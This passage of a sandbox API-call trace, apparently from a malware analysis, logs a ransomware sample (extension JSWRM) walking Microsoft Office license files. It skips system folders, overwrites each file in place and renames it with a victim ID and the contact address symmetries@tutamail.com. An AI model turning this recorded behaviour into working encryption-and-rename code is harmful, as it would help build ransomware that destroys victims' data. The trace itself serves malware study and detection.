[0111.392] lstrcmpiW (lpString1="VisioProO365R_SubTest-ppd.xrm-ms", lpString2="perflogs") returned 1 [0111.392] lstrcmpiW (lpString1="VisioProO365R_SubTest-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0111.392] lstrcmpiW (lpString1="VisioProO365R_SubTest-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.392] lstrcmpiW (lpString1="VisioProO365R_SubTest-ppd.xrm-ms", lpString2="system volume information") returned 1 [0111.392] lstrcmpiW (lpString1="VisioProO365R_SubTest-ppd.xrm-ms", lpString2="msocache") returned 1 [0111.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c2d0 [0111.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_SubTest-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0111.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_SubTest-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProO365R_SubTest-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0111.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c2d0 | out: hHeap=0x1e0000) returned 1 [0111.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0111.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_SubTest-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0111.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_SubTest-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProO365R_SubTest-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0111.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0111.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0111.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0111.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0111.393] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_SubTest-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subtest-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.393] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20921) returned 1 [0111.393] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x51b0) returned 0x24c1d0 [0111.393] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x51b0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x51b0, lpOverlapped=0x0) returned 1 [0111.396] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.396] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x51b0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x51b0, lpOverlapped=0x0) returned 1 [0111.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.396] CloseHandle (hObject=0x45c) returned 1 [0111.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0111.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0111.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0111.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0111.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0111.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0111.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0111.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0111.397] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_SubTest-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subtest-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_SubTest-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subtest-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0111.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0111.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0111.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.398] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebf44bc1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xebf44bc1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec370db9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d63, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProO365R_SubTest-ul-oob.xrm-ms", cAlternateFileName="VI0BF0~1.XRM")) returned 1 [0111.398] lstrcmpiW (lpString1="VisioProO365R_SubTest-ul-oob.xrm-ms", lpString2=".") returned 1 [0111.398] lstrcmpiW (lpString1="VisioProO365R_SubTest-ul-oob.xrm-ms", lpString2="..") returned 1 [0111.398] lstrcmpiW (lpString1="VisioProO365R_SubTest-ul-oob.xrm-ms", lpString2="...") returned 1 [0111.398] lstrcmpiW (lpString1="VisioProO365R_SubTest-ul-oob.xrm-ms", lpString2="windows") returned -1 [0111.398] lstrcmpiW (lpString1="VisioProO365R_SubTest-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0111.398] lstrcmpiW (lpString1="VisioProO365R_SubTest-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0111.398] lstrcmpiW (lpString1="VisioProO365R_SubTest-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0111.398] lstrcmpiW (lpString1="VisioProO365R_SubTest-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.398] lstrcmpiW (lpString1="VisioProO365R_SubTest-ul-oob.xrm-ms", lpString2="system volume information") returned 1 [0111.398] lstrcmpiW (lpString1="VisioProO365R_SubTest-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0111.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0111.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_SubTest-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0111.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_SubTest-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22d0a0, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProO365R_SubTest-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0111.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0111.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0111.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_SubTest-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0111.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_SubTest-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22d260, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProO365R_SubTest-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0111.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0111.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0111.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0111.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0111.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_SubTest-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subtest-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.399] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11619) returned 1 [0111.399] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0111.399] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0111.464] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.464] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0111.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.464] CloseHandle (hObject=0x45c) returned 1 [0111.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0111.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0111.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0111.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0111.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0111.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0111.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0111.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0111.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0111.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0111.465] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_SubTest-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subtest-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_SubTest-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subtest-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0111.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0111.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0111.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.467] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebe138d5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xebe138d5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xebf1e959, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bab, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProO365R_SubTrial-pl.xrm-ms", cAlternateFileName="VI241F~1.XRM")) returned 1 [0111.467] lstrcmpiW (lpString1="VisioProO365R_SubTrial-pl.xrm-ms", lpString2=".") returned 1 [0111.467] lstrcmpiW (lpString1="VisioProO365R_SubTrial-pl.xrm-ms", lpString2="..") returned 1 [0111.467] lstrcmpiW (lpString1="VisioProO365R_SubTrial-pl.xrm-ms", lpString2="...") returned 1 [0111.467] lstrcmpiW (lpString1="VisioProO365R_SubTrial-pl.xrm-ms", lpString2="windows") returned -1 [0111.467] lstrcmpiW (lpString1="VisioProO365R_SubTrial-pl.xrm-ms", lpString2="recovery") returned 1 [0111.467] lstrcmpiW (lpString1="VisioProO365R_SubTrial-pl.xrm-ms", lpString2="perflogs") returned 1 [0111.467] lstrcmpiW (lpString1="VisioProO365R_SubTrial-pl.xrm-ms", lpString2="documents and settings") returned 1 [0111.467] lstrcmpiW (lpString1="VisioProO365R_SubTrial-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.467] lstrcmpiW (lpString1="VisioProO365R_SubTrial-pl.xrm-ms", lpString2="system volume information") returned 1 [0111.467] lstrcmpiW (lpString1="VisioProO365R_SubTrial-pl.xrm-ms", lpString2="msocache") returned 1 [0111.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0111.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_SubTrial-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0111.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_SubTrial-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProO365R_SubTrial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0111.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0111.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0111.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_SubTrial-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0111.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0111.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_SubTrial-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22ce70, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProO365R_SubTrial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0111.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0111.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0111.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0111.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0111.468] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_SubTrial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subtrial-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.469] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11179) returned 1 [0111.469] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ba0) returned 0x24c1d0 [0111.469] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2ba0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2ba0, lpOverlapped=0x0) returned 1 [0111.483] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.483] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2ba0, lpOverlapped=0x0) returned 1 [0111.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.483] CloseHandle (hObject=0x45c) returned 1 [0111.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0111.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0111.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a228 [0111.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a228, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a228 | out: hHeap=0x1e0000) returned 1 [0111.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0111.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0111.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0111.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0111.484] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_SubTrial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subtrial-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_SubTrial-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subtrial-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0111.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0111.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0111.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0111.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.486] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, 